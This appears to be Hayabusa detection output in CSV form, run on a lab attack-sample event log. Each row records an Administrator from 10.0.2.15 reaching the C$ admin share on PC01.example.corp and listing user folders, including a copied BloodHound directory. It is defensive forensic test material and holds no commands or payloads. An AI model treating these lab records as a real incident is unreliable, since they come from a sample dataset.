10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Videos\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Links : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Links\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Documents : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Pictures : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Music\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Contacts : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.037 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.037 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.037 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.047 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\locales : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.047 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.047 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\Ingestors : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\Ingestors\DebugBuilds : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.067 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.067 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.067 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\helpers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.077 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ 
: Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\node_modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.077 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\regenerator : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\css : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.097 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\less : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.097 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\scss : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.107 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\sprites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.107 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\svgs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.107 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\webfonts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 